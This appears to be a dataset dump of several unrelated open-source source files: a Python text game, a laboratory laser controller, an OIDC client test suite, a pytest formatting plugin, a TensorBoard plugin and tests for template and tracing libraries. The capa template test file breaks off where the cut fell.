| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated |
|---|---|---|---|---|---|---|---|---|---|---|
| stringlengths 5–92 | stringlengths 4–232 | stringclasses, 19 values | stringlengths 4–7 | stringlengths 721–1.04M | stringclasses, 15 values | int64, -9,223,277,421,539,062,000 to 9,223,102,107B | float64, 6.51–99.9 | int64, 15–997 | float64, 0.25–0.97 | bool, 1 class |
JasonDeving/python_game | character.py | 1 | 1119 |
import random

from combat import Combat


class Character(Combat):
    attack_limit = 10
    experience = 0
    base_hit_points = 10

    def attack(self):
        roll = random.randint(1, self.attack_limit)
        if self.weapon == 'sword':
            roll += 1
        elif self.weapon == 'axe':
            roll += 2
        return roll > 4

    def get_weapon(self):
        weapon_choice = input("Weapon ([S]word, [A]xe, [B]ow): ").lower()
        if weapon_choice in 'sab':
            if weapon_choice == 's':
                return 'sword'
            elif weapon_choice == 'a':
                return 'axe'
            else:
                return 'bow'
        else:
            return self.get_weapon()

    def __init__(self, **kwargs):
        self.name = input("Name: ")
        self.weapon = self.get_weapon()
        self.hit_points = self.base_hit_points
        for key, value in kwargs.items():
            setattr(self, key, value)

    def __str__(self):
        return '{}, HP: {}, XP: {}'.format(self.name, self.hit_points, self.experience)

    def rest(self):
        if self.hit_points < self.base_hit_points:
            self.hit_points += 1

    def leveled_up(self):
        return self.experience >= 5
| mit | -2,028,627,748,923,431,400 | 22.829787 | 83 | 0.572833 | false |
NMGRL/pychron | pychron/lasers/laser_managers/chromium_laser_manager.py | 1 | 9853 |
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================

# ============= enthought library imports =======================
# ============= standard library imports ========================
import time

# ============= local library imports  ==========================
from pychron.core.helpers.strtools import csv_to_floats
from pychron.experiment.utilities.position_regex import SCAN_REGEX
from pychron.lasers.laser_managers.ethernet_laser_manager import EthernetLaserManager


class ChromiumLaserManager(EthernetLaserManager):
    stage_manager_id = 'chromium.pychron'
    configuration_dir_name = 'chromium'
    _alive = False

    def setup_communicator(self):
        com = super(ChromiumLaserManager, self).setup_communicator()
        if self.communicator:
            self.communicator.write_terminator = '\n\r'
        return com

    def set_tray(self, t):
        if self.stage_manager:
            self.stage_manager.stage_map_name = t

    def end_extract(self, *args, **kw):
        self._ask('laser.stop')
        self.info('ending extraction. set laser power to 0')
        self.set_laser_power(0)
        if self._patterning:
            self.stop_pattern()

    def fire_laser(self):
        self.info('fire laser')
        self._ask('laser.fire')

    def extract(self, value, units=None, tol=0.1, fire_laser=True):
        if units is None:
            units = 'watts'

        self.info('set laser output to {} {}'.format(value, units))
        if units == 'watts':
            ovalue = value
            value = self.calculate_calibrated_power(value)
            if value < 0:
                self.warning('Consider changing your calibration curve. '
                             '{} watts converted to {}%. % must be positive'.format(ovalue, value))
                value = 0

        resp = self.set_laser_power(value)
        if fire_laser:
            time.sleep(1)
            self.fire_laser()

        try:
            return abs(float(resp) - value) < tol
        except BaseException:
            pass

    def set_laser_power(self, v):
        return self._ask('laser.output {}'.format(v))

    def enable_laser(self, **kw):
        # self.ask('laser.enable ON')
        self.enabled = True

    def disable_laser(self):
        self._ask('laser.stop')
        self.enabled = False

    def get_position(self):
        x, y, z = self._x, self._y, self._z
        xyz_microns = self._ask('stage.pos?')
        if xyz_microns:
            x, y, z = [float(v) / 1000. for v in xyz_microns.split(',')]
            if self.stage_manager.use_sign_position_correction:
                x = x * self.stage_manager.x_sign
                y = y * self.stage_manager.y_sign
                z = z * self.stage_manager.z_sign
        return x, y, z

    def linear_move(self, x, y, block=False, *args, **kw):
        self._move_to_position((x, y), block=block)

    def stop(self):
        self._ask('stage.stop')
        self._alive = False
        self.update_position()

    # private
    def _stage_stop_button_fired(self):
        self.stop()

    def _fire_laser_button_fired(self):
        if self._firing:
            cmd = 'laser.stop'
        else:
            cmd = 'laser.fire'
        self._firing = not self._firing
        self._ask(cmd)

    def _output_power_changed(self, new):
        self.extract(new, self.units, fire_laser=False)

    def _set_x(self, v):
        if self._move_enabled:
            self._alive = True
            self._ask('stage.moveto {},{},{},{},{},{}'.format(v * 1000, self._y * 1000, self._z * 1000, 10, 10, 0))
            self._single_axis_moving(v * 1000, 0)

    def _set_y(self, v):
        if self._move_enabled:
            self._alive = True
            self._ask('stage.moveto {},{},{},{},{},{}'.format(self._x * 1000, v * 1000, self._z * 1000, 10, 10, 0))
            self._single_axis_moving(v * 1000, 1)

    def _set_z(self, v):
        if self._move_enabled:
            self._alive = True
            self._ask('stage.moveto {},{},{},{},{},{}'.format(self._x * 1000, self._y * 1000, v * 1000, 10, 10, 0))
            self._single_axis_moving(v * 1000, 2)

    def _single_axis_moving(self, v, axis):
        def cmpfunc(xyz):
            try:
                if not self._alive:
                    return True

                pos = float(xyz.split(',')[axis])
                return abs(pos - v) > 2
            except ValueError as e:
                print('_moving exception {}'.format(e))

        self._block(cmd='stage.pos?', cmpfunc=cmpfunc)
        time.sleep(0.25)
        self._alive = False
        self.update_position()

    def _move_to_position(self, pos, block=True, *args, **kw):
        sm = self.stage_manager
        try:
            x, y = self._get_hole_xy(pos)
        except ValueError:
            return

        z = self._z
        xs = 5000
        ys = 5000
        zs = 100

        self._alive = True
        self.debug('pos={}, x={}, y={}'.format(pos, x, y))
        xm = x * 1000
        ym = y * 1000
        zm = z * 1000
        if sm.use_sign_position_correction:
            xm *= sm.x_sign
            ym *= sm.y_sign
            zm *= sm.z_sign

        cmd = 'stage.moveto {:0.0f},{:0.0f},{:0.0f},{:0.0f},{:0.0f},{:0.0f}'.format(xm, ym, zm, xs, ys, zs)
        self.info('sending {}'.format(cmd))
        self._ask(cmd)
        time.sleep(1)
        return self._moving(xm, ym, zm, block)

    def _moving(self, xm, ym, zm, block=True):
        r = True
        if block:
            time.sleep(0.05)

            def cmpfunc(xyz):
                try:
                    if not self._alive:
                        return True

                    ps = csv_to_floats(xyz)
                    return not all(abs(a - b) <= 10 for a, b in zip(ps, (xm, ym, zm)))
                except ValueError as e:
                    print('_moving exception {}'.format(e))

            r = self._block(cmd='stage.pos?', cmpfunc=cmpfunc, period=1)
            self._alive = False
            self.update_position()
        return r

    def _stage_manager_default(self):
        args = dict(name='stage',
                    configuration_name='stage',
                    configuration_dir_name=self.configuration_dir_name,
                    parent=self)
        return self._stage_manager_factory(args)

    def _stage_manager_factory(self, args):
        from pychron.lasers.stage_managers.chromium_stage_manager import ChromiumStageManager

        self.stage_args = args
        klass = ChromiumStageManager
        sm = klass(**args)
        sm.id = self.stage_manager_id
        return sm

    def _pattern_executor_default(self):
        from pychron.lasers.pattern.pattern_executor import PatternExecutor
        pm = PatternExecutor(application=self.application,
                             controller=self,
                             laser_manager=self)
        return pm


class ChromiumCO2Manager(ChromiumLaserManager):
    pass


class ChromiumDiodeManager(ChromiumLaserManager):
    pass


def scans(cmd):
    return 'Scans.{}'.format(cmd)


class ChromiumUVManager(ChromiumLaserManager):
    configuration_dir_name = 'chromium_uv'
    _active_scan = None

    def active_scan_cmd(self, cmd):
        return scans('{} {}'.format(cmd, self._active_scan))

    def ask_active_scan(self, cmd):
        return self._ask(self.active_scan_cmd(cmd))

    def _opened_hook(self):
        self._ask(scans('Status_Verbosity 1'))

    def warmup(self, block=None):
        if self._active_scan:
            self._warmed = True
            self.ask_active_scan('Run')
            if block:
                def func(r):
                    return r.lower() != 'running: warming up laser...'

                self._block(cmd=scans('Status?'), cmpfunc=func, timeout=120)

    def extract(self, *args, **kw):
        if self._active_scan:
            if not self._warmed:
                self.ask_active_scan('Run')

            def func(r):
                return str(r).strip().lower() != 'idle: idle'

            self._block(cmd=scans('Status?'), cmpfunc=func, timeout=kw.get('block', 300) or 300)
            self._warmed = False
            return True
        else:
            return super(ChromiumUVManager, self).extract(*args, **kw)

    def _move_to_position(self, pos, *args, **kw):
        # if position is a valid predefined scan list use it,
        # otherwise interpret as a normal hole/x,y position
        scan_id = self._get_scan_id(pos)
        if scan_id:
            self._active_scan = scan_id
            self.ask_active_scan('MoveTo')

            def func(r):
                return not bool(int(r))

            self._block(cmd=self.active_scan_cmd('InPos?'), cmpfunc=func)
        else:
            self._active_scan = None
            return super(ChromiumUVManager, self)._move_to_position(pos, *args, **kw)

    def disable_laser(self):
        self._ask(scans('Stop'))
        super(ChromiumUVManager, self).disable_laser()

    def _get_scan_id(self, pos):
        m = SCAN_REGEX[0].match(pos)
        if m:
            return int(m.group('id')[1:])
        return

# ============= EOF =============================================
| apache-2.0 | 1,684,627,198,782,123,500 | 30.580128 | 115 | 0.533036 | false |
b52/lala | setup.py | 1 | 1548 |
#!/usr/bin/env python
# Copyright (C) 2010 Oliver Mader <b52@reaktor42.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from setuptools import setup

setup(
    name='lala',
    version='0.1',
    description='A slick yet powerful mpd web client',
    author='Oliver Mader',
    author_email='b52@reaktor42.de',
    url='http://reaktor42.de/projects/lala',
    license='MIT',
    keywords='mpd lala',
    install_requires=['python-mpd-twisted'],
    packages=['lala'],
    include_package_data=True,
    platforms=['Independent']
)
| mit | 83,876,511,869,762,020 | 39.736842 | 79 | 0.742248 | false |
zamzterz/Flask-pyoidc | tests/test_pyoidc_facade.py | 1 | 13038 |
import time
import base64

import pytest
import responses
from oic.oic import AuthorizationResponse, AccessTokenResponse, TokenErrorResponse, OpenIDSchema, \
    AuthorizationErrorResponse
from urllib.parse import parse_qsl, urlparse

from flask_pyoidc.provider_configuration import ProviderConfiguration, ClientMetadata, ProviderMetadata, \
    ClientRegistrationInfo
from flask_pyoidc.pyoidc_facade import PyoidcFacade, _ClientAuthentication
from .util import signed_id_token

REDIRECT_URI = 'https://rp.example.com/redirect_uri'


class TestPyoidcFacade(object):
    PROVIDER_BASEURL = 'https://op.example.com'
    PROVIDER_METADATA = ProviderMetadata(PROVIDER_BASEURL,
                                         PROVIDER_BASEURL + '/auth',
                                         PROVIDER_BASEURL + '/jwks')
    CLIENT_METADATA = ClientMetadata('client1', 'secret1')

    def test_registered_client_metadata_is_forwarded_to_pyoidc(self):
        config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA, client_metadata=self.CLIENT_METADATA)
        facade = PyoidcFacade(config, REDIRECT_URI)
        assert facade._client.registration_response

    def test_no_registered_client_metadata_is_handled(self):
        config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                       client_registration_info=ClientRegistrationInfo())
        facade = PyoidcFacade(config, REDIRECT_URI)
        assert not facade._client.registration_response

    def test_is_registered(self):
        unregistered = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                             client_registration_info=ClientRegistrationInfo())
        registered = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                           client_metadata=self.CLIENT_METADATA)
        assert PyoidcFacade(unregistered, REDIRECT_URI).is_registered() is False
        assert PyoidcFacade(registered, REDIRECT_URI).is_registered() is True

    @responses.activate
    def test_register(self):
        registration_endpoint = self.PROVIDER_BASEURL + '/register'
        responses.add(responses.POST, registration_endpoint, json=self.CLIENT_METADATA.to_dict())
        provider_metadata = self.PROVIDER_METADATA.copy(registration_endpoint=registration_endpoint)
        unregistered = ProviderConfiguration(provider_metadata=provider_metadata,
                                             client_registration_info=ClientRegistrationInfo())
        facade = PyoidcFacade(unregistered, REDIRECT_URI)
        facade.register()
        assert facade.is_registered() is True

    def test_authentication_request(self):
        extra_user_auth_params = {'foo': 'bar', 'abc': 'xyz'}
        config = ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                       client_metadata=self.CLIENT_METADATA,
                                       auth_request_params=extra_user_auth_params)

        state = 'test_state'
        nonce = 'test_nonce'

        facade = PyoidcFacade(config, REDIRECT_URI)
        extra_lib_auth_params = {'foo': 'baz', 'qwe': 'rty'}
        auth_request = facade.authentication_request(state, nonce, extra_lib_auth_params)

        expected_auth_params = {
            'scope': 'openid',
            'response_type': 'code',
            'client_id': self.CLIENT_METADATA['client_id'],
            'redirect_uri': REDIRECT_URI,
            'state': state,
            'nonce': nonce
        }
        expected_auth_params.update(extra_user_auth_params)
        expected_auth_params.update(extra_lib_auth_params)

        assert auth_request.to_dict() == expected_auth_params

    def test_parse_authentication_response(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        auth_code = 'auth_code-1234'
        state = 'state-1234'
        auth_response = AuthorizationResponse(**{'state': state, 'code': auth_code})
        parsed_auth_response = facade.parse_authentication_response(auth_response.to_dict())
        assert isinstance(parsed_auth_response, AuthorizationResponse)
        assert parsed_auth_response.to_dict() == auth_response.to_dict()

    def test_parse_authentication_response_handles_error_response(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        error_response = AuthorizationErrorResponse(**{'error': 'invalid_request', 'state': 'state-1234'})
        parsed_auth_response = facade.parse_authentication_response(error_response)
        assert isinstance(parsed_auth_response, AuthorizationErrorResponse)
        assert parsed_auth_response.to_dict() == error_response.to_dict()

    @responses.activate
    def test_parse_authentication_response_preserves_id_token_jwt(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        state = 'state-1234'
        now = int(time.time())
        id_token, id_token_signing_key = signed_id_token({
            'iss': self.PROVIDER_METADATA['issuer'],
            'sub': 'test_sub',
            'aud': 'client1',
            'exp': now + 1,
            'iat': now
        })
        responses.add(responses.GET,
                      self.PROVIDER_METADATA['jwks_uri'],
                      json={'keys': [id_token_signing_key.serialize()]})
        auth_response = AuthorizationResponse(**{'state': state, 'id_token': id_token})
        parsed_auth_response = facade.parse_authentication_response(auth_response)
        assert isinstance(parsed_auth_response, AuthorizationResponse)
        assert parsed_auth_response['state'] == state
        assert parsed_auth_response['id_token_jwt'] == id_token

    @pytest.mark.parametrize('request_func,expected_token_request', [
        (
            lambda facade: facade.exchange_authorization_code('auth-code'),
            {
                'grant_type': 'authorization_code',
                'code': 'auth-code',
                'redirect_uri': REDIRECT_URI
            }
        ),
        (
            lambda facade: facade.refresh_token('refresh-token'),
            {
                'grant_type': 'refresh_token',
                'refresh_token': 'refresh-token',
                'redirect_uri': REDIRECT_URI
            }
        )
    ])
    @responses.activate
    def test_token_request(self, request_func, expected_token_request):
        token_endpoint = self.PROVIDER_BASEURL + '/token'
        now = int(time.time())
        id_token_claims = {
            'iss': self.PROVIDER_METADATA['issuer'],
            'sub': 'test_user',
            'aud': [self.CLIENT_METADATA['client_id']],
            'exp': now + 1,
            'iat': now,
            'nonce': 'test_nonce'
        }
        id_token_jwt, id_token_signing_key = signed_id_token(id_token_claims)
        token_response = AccessTokenResponse(access_token='test_access_token',
                                             token_type='Bearer',
                                             id_token=id_token_jwt)
        responses.add(responses.POST, token_endpoint, json=token_response.to_dict())
        provider_metadata = self.PROVIDER_METADATA.copy(token_endpoint=token_endpoint)
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)

        responses.add(responses.GET,
                      self.PROVIDER_METADATA['jwks_uri'],
                      json={'keys': [id_token_signing_key.serialize()]})

        token_response = request_func(facade)
        assert isinstance(token_response, AccessTokenResponse)
        expected_token_response = token_response.to_dict()
        expected_token_response['id_token'] = id_token_claims
        expected_token_response['id_token_jwt'] = id_token_jwt
        assert token_response.to_dict() == expected_token_response

        token_request = dict(parse_qsl(responses.calls[0].request.body))
        assert token_request == expected_token_request

    @responses.activate
    def test_token_request_handles_error_response(self):
        token_endpoint = self.PROVIDER_BASEURL + '/token'
        token_response = TokenErrorResponse(error='invalid_request', error_description='test error description')
        responses.add(responses.POST, token_endpoint, json=token_response.to_dict(), status=400)
        provider_metadata = self.PROVIDER_METADATA.copy(token_endpoint=token_endpoint)
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        assert facade.exchange_authorization_code('1234') == token_response

    def test_token_request_handles_missing_provider_token_endpoint(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        assert facade.exchange_authorization_code('1234') is None

    @pytest.mark.parametrize('userinfo_http_method', [
        'GET',
        'POST'
    ])
    @responses.activate
    def test_configurable_userinfo_endpoint_method_is_used(self, userinfo_http_method):
        userinfo_endpoint = self.PROVIDER_BASEURL + '/userinfo'
        userinfo_response = OpenIDSchema(sub='user1')
        responses.add(userinfo_http_method, userinfo_endpoint, json=userinfo_response.to_dict())
        provider_metadata = self.PROVIDER_METADATA.copy(userinfo_endpoint=userinfo_endpoint)
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
                                                    client_metadata=self.CLIENT_METADATA,
                                                    userinfo_http_method=userinfo_http_method),
                              REDIRECT_URI)
        assert facade.userinfo_request('test_token') == userinfo_response

    def test_no_userinfo_request_is_made_if_no_userinfo_http_method_is_configured(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA,
                                                    userinfo_http_method=None),
                              REDIRECT_URI)
        assert facade.userinfo_request('test_token') is None

    def test_no_userinfo_request_is_made_if_no_userinfo_endpoint_is_configured(self):
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=self.PROVIDER_METADATA,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        assert facade.userinfo_request('test_token') is None

    def test_no_userinfo_request_is_made_if_no_access_token(self):
        provider_metadata = self.PROVIDER_METADATA.copy(userinfo_endpoint=self.PROVIDER_BASEURL + '/userinfo')
        facade = PyoidcFacade(ProviderConfiguration(provider_metadata=provider_metadata,
                                                    client_metadata=self.CLIENT_METADATA),
                              REDIRECT_URI)
        assert facade.userinfo_request(None) is None


class TestClientAuthentication(object):
    CLIENT_ID = 'client1'
    CLIENT_SECRET = 'secret1'

    @property
    def basic_auth(self):
        credentials = '{}:{}'.format(self.CLIENT_ID, self.CLIENT_SECRET)
        return 'Basic {}'.format(base64.urlsafe_b64encode(credentials.encode('utf-8')).decode('utf-8'))

    @pytest.fixture(autouse=True)
    def setup(self):
        self.client_auth = _ClientAuthentication(self.CLIENT_ID, self.CLIENT_SECRET)

    def test_client_secret_basic(self):
        request = {}
        headers = self.client_auth('client_secret_basic', request)
        assert headers == {'Authorization': self.basic_auth}
        assert request == {}

    def test_client_secret_post(self):
        request = {}
        headers = self.client_auth('client_secret_post', request)
        assert headers is None
        assert request == {'client_id': self.CLIENT_ID, 'client_secret': self.CLIENT_SECRET}

    def test_defaults_to_client_secret_basic(self):
        assert self.client_auth('invalid_client_auth_method', {}) == self.client_auth('client_secret_basic', {})
| apache-2.0 | -6,834,126,658,428,720,000 | 48.954023 | 118 | 0.613208 | false |
django-stars/pytest-yapf | pytest_yapf.py | 1 | 2014 |
import os

from yapf.yapflib import file_resources
from yapf.yapflib.style import CreateStyleFromConfig
from yapf.yapflib.yapf_api import FormatFile

import pytest


def pytest_addoption(parser):
    group = parser.getgroup('yapf')
    group.addoption('--yapf', action='store_true', help='run yapf on *.py files.')
    group.addoption('--yapfdiff', action='store_true', help='show diff of yapf output.')
    group.addoption('--yapfstyle', action='store', dest='yapfstyle', default=None, help='style to be used by yapf.')


def pytest_collect_file(path, parent):
    config = parent.config
    if config.option.yapf and path.ext == '.py':
        return YapfItem(path, parent)


class YapfError(Exception):
    pass


class YapfItem(pytest.Item, pytest.File):
    def __init__(self, path, parent):
        super(YapfItem, self).__init__(path, parent)
        self.path = str(path)
        self.show_diff = self.parent.config.option.yapfdiff is True
        self.style = self.parent.config.getoption('yapfstyle') or file_resources.GetDefaultStyleForDir(self.path)

    def runtest(self):
        filename = self.path
        error = None
        try:
            diff, encoding, is_changed = FormatFile(self.path, style_config=self.style, print_diff=True)
        except BaseException as e:
            raise BaseException(e)
        if is_changed:
            file_lines = diff.split('\n')
            lines_added = len([x for x in file_lines if x.startswith('+')])
            lines_removed = len([x for x in file_lines if x.startswith('-')])
            message = "ERROR: %s Code formatting is not correct." % (filename, )
            message = "%s\n Diff: -%s/+%s lines" % (message, lines_removed, lines_added)
            if self.show_diff:
                message = "%s\n\n%s" % (message, diff)
            raise YapfError(message)

    def repr_failure(self, excinfo):
        if excinfo.errisinstance(YapfError):
            return excinfo.value.args[0]
        return super().repr_failure(excinfo)
| mit | 5,730,433,035,302,565,000 | 34.333333 | 116 | 0.634062 | false |
tupes/School | CS333/utilities.py | 1 | 1130 |
from string import ascii_letters
import re

NONLETTERS_PATTERN = re.compile('[^A-Z]')


def removeTextNonLetters(message):
    return NONLETTERS_PATTERN.sub('', message.upper())


def removeBinaryNonLetters(message):
    return ''.join([chr(b).upper() for b in message if chr(b) in ascii_letters])


def getInBothCount(s1, s2):
    return len({x for x in s1} & {y for y in s2})


# ############################
# UTILITY CONVERSION FUNCTIONS
# ############################

hexDigits = "0123456789ABCDEF"


def getHexString(_string):
    return hex(ord(_string))


def getPaddedHexString(_int):
    h = hex(_int)
    return h if len(h) > 3 else '0x0' + h[-1]


def getChar(_hex):
    return chr(int(_hex, 16))


def getHigherHex(string):
    return getHex(string[2])


def getLowerHex(string):
    return getHex(string[3])


def getHex(char):
    return int("0x0" + char, 16)


def convertToHex(ch, cl):
    return "0x" + hexDigits[ch] + hexDigits[cl]


def getBinary(char):
    return bytes.fromhex(hex(ord(char))[2:])


def getBinary(char):  # noqa: F811 -- this redefinition shadows the version above
    return bytes.fromhex(char[2:])


def getSymbol(symbol):
    return symbol if type(symbol) == str else chr(symbol)
| gpl-3.0 | 2,740,902,373,908,748,300 | 20.730769 | 77 | 0.653982 | false |
shakedel/tensorboard | tensorboard/plugins/distribution/distributions_plugin.py | 1 | 2702 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""The TensorBoard Distributions (a.k.a. compressed histograms) plugin."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from werkzeug import wrappers

from tensorboard.backend import http_util
from tensorboard.backend.event_processing import event_accumulator
from tensorboard.plugins import base_plugin

_PLUGIN_PREFIX_ROUTE = event_accumulator.COMPRESSED_HISTOGRAMS


class DistributionsPlugin(base_plugin.TBPlugin):
    """Distributions Plugin for TensorBoard."""

    plugin_name = _PLUGIN_PREFIX_ROUTE

    def __init__(self, context):
        """Instantiates DistributionsPlugin via TensorBoard core.

        Args:
          context: A base_plugin.TBContext instance.
        """
        self._multiplexer = context.multiplexer

    def get_plugin_apps(self):
        return {
            '/distributions': self.distributions_route,
            '/tags': self.tags_route,
        }

    def is_active(self):
        """This plugin is active iff any run has at least one relevant tag."""
        return bool(self._multiplexer) and any(self.index_impl().values())

    def index_impl(self):
        return {
            run_name: run_data[event_accumulator.COMPRESSED_HISTOGRAMS]
            for (run_name, run_data) in self._multiplexer.Runs().items()
            if event_accumulator.COMPRESSED_HISTOGRAMS in run_data
        }

    def distributions_impl(self, tag, run):
        """Result of the form `(body, mime_type)`."""
        values = self._multiplexer.CompressedHistograms(run, tag)
        return (values, 'application/json')

    @wrappers.Request.application
    def tags_route(self, request):
        index = self.index_impl()
        return http_util.Respond(request, index, 'application/json')

    @wrappers.Request.application
    def distributions_route(self, request):
        """Given a tag and single run, return array of compressed histograms."""
        tag = request.args.get('tag')
        run = request.args.get('run')
        (body, mime_type) = self.distributions_impl(tag, run)
        return http_util.Respond(request, body, mime_type)
| apache-2.0 | 3,228,192,643,375,584,000 | 34.552632 | 80 | 0.699852 | false |
alip/pinktrace | python/TEST_socket.py | 1 | 1433 |
#!/usr/bin/env python
# coding: utf-8

import os, signal, socket, sys, unittest

sys.path.insert(0, '.')

import pinktrace
import pinktrace.event
import pinktrace.socket
import pinktrace.syscall
import pinktrace.trace

UNAME = os.uname()


class TestSocket_01_Invalid(unittest.TestCase):

    def test_01_name(self):
        if UNAME[0] != 'Linux': return
        self.assertRaises(TypeError, pinktrace.socket.name)

    def test_02_decode_call(self):
        if UNAME[0] != 'Linux': return
        self.assertRaises(TypeError, pinktrace.socket.decode_call)
        self.assertRaises(TypeError, pinktrace.socket.decode_call, 'pink')
        self.assertRaises(ValueError, pinktrace.socket.decode_call, 0, 13)

    def test_03_decode_fd(self):
        if UNAME[0] != 'Linux': return
        self.assertRaises(TypeError, pinktrace.socket.decode_fd)
        self.assertRaises(IndexError, pinktrace.socket.decode_fd, 0, pinktrace.syscall.MAX_ARGS)
        self.assertRaises(ValueError, pinktrace.socket.decode_fd, 0, 1, 13)

    def test_04_decode_address(self):
        self.assertRaises(TypeError, pinktrace.socket.decode_address)
        self.assertRaises(TypeError, pinktrace.socket.decode_address, 0)
        self.assertRaises(IndexError, pinktrace.socket.decode_address, 0, pinktrace.syscall.MAX_ARGS)
        self.assertRaises(ValueError, pinktrace.socket.decode_address, 0, 1, 13)


if __name__ == '__main__':
    unittest.main()
| bsd-3-clause | -1,387,399,357,694,751,200 | 32.325581 | 101 | 0.701326 | false |
vismartltd/edx-platform | common/lib/capa/capa/tests/test_input_templates.py | 1 | 39385 |
"""
Tests for the logic in input type mako templates.
"""
import unittest
import capa
import os.path
import json
from lxml import etree
from mako.template import Template as MakoTemplate
from mako import exceptions
from capa.inputtypes import Status
class TemplateError(Exception):
"""
Error occurred while rendering a Mako template.
"""
pass
class TemplateTestCase(unittest.TestCase):
"""
Utilitites for testing templates.
"""
# Subclasses override this to specify the file name of the template
# to be loaded from capa/templates.
# The template name should include the .html extension:
# for example: choicegroup.html
TEMPLATE_NAME = None
def setUp(self):
"""
Load the template under test.
"""
super(TemplateTestCase, self).setUp()
capa_path = capa.__path__[0]
self.template_path = os.path.join(capa_path,
'templates',
self.TEMPLATE_NAME)
with open(self.template_path) as f:
self.template = MakoTemplate(f.read())
def render_to_xml(self, context_dict):
"""
Render the template using the `context_dict` dict.
Returns an `etree` XML element.
"""
# add dummy STATIC_URL to template context
context_dict.setdefault("STATIC_URL", "/dummy-static/")
try:
xml_str = self.template.render_unicode(**context_dict)
except:
raise TemplateError(exceptions.text_error_template().render())
# Attempt to construct an XML tree from the template
# This makes it easy to use XPath to make assertions, rather
# than dealing with a string.
# We modify the string slightly by wrapping it in <test>
# tags, to ensure it has one root element.
try:
xml = etree.fromstring("<test>" + xml_str + "</test>")
except Exception as exc:
raise TemplateError("Could not parse XML from '{0}': {1}".format(
xml_str, str(exc)))
else:
return xml
def assert_has_xpath(self, xml_root, xpath, context_dict, exact_num=1):
"""
Asserts that the xml tree has an element satisfying `xpath`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`context` is used to print a debugging message
`exact_num` is the exact number of matches to expect.
"""
message = ("XML does not have %d match(es) for xpath '%s'\nXML: %s\nContext: %s"
% (exact_num, str(xpath), etree.tostring(xml_root), str(context_dict)))
self.assertEqual(len(xml_root.xpath(xpath)), exact_num, msg=message)
def assert_no_xpath(self, xml_root, xpath, context_dict):
"""
Asserts that the xml tree does NOT have an element
satisfying `xpath`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`context` is used to print a debugging message
"""
self.assert_has_xpath(xml_root, xpath, context_dict, exact_num=0)
def assert_has_text(self, xml_root, xpath, text, exact=True):
"""
Find the element at `xpath` in `xml_root` and assert
that its text is `text`.
`xml_root` is an etree XML element
`xpath` is an XPath string, such as `'/foo/bar'`
`text` is the expected text that the element should contain
If multiple elements are found, checks the first one.
If no elements are found, the assertion fails.
"""
element_list = xml_root.xpath(xpath)
self.assertTrue(len(element_list) > 0,
"Could not find element at '%s'" % str(xpath))
if exact:
self.assertEqual(text, element_list[0].text)
else:
self.assertIn(text, element_list[0].text)
class ChoiceGroupTemplateTest(TemplateTestCase):
"""
Test mako template for `<choicegroup>` input.
"""
TEMPLATE_NAME = 'choicegroup.html'
def setUp(self):
